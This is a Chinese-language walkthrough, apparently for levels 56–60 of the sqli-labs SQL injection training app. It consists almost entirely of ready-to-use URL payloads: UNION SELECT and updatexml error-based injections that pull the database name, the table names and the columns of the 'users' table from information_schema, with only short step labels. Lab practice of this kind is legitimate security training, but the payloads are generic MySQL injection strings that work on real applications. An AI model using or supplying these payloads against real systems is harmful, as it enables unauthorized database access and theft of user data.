第56关
一查询数据库
?id=-1')union select 1,2,database()--+
二.查表
?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
三.查看users表中列名
?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
第57关
一.查看数据库
?id=-1"union select 1,2,database()--+
二.查看表名
?id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
三.查看users表中列名
?id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
第58关
一.查看数据库
?id=1' and updatexml(1,concat(1,(select database())),1)--+
二.查看表名
?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
三.查看users表中列名
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
第59关
一.查看数据库
?id=1 and updatexml(1,concat(1,(select database())),1)
二.查看表名
?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
三.查看users表中列名
?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
第60关
一.查看数据库
?id=1") and updatexml(1,concat(1,(select database())),1)--+
二.查看表名
?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
三.查看users表中列名
?id=1")and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+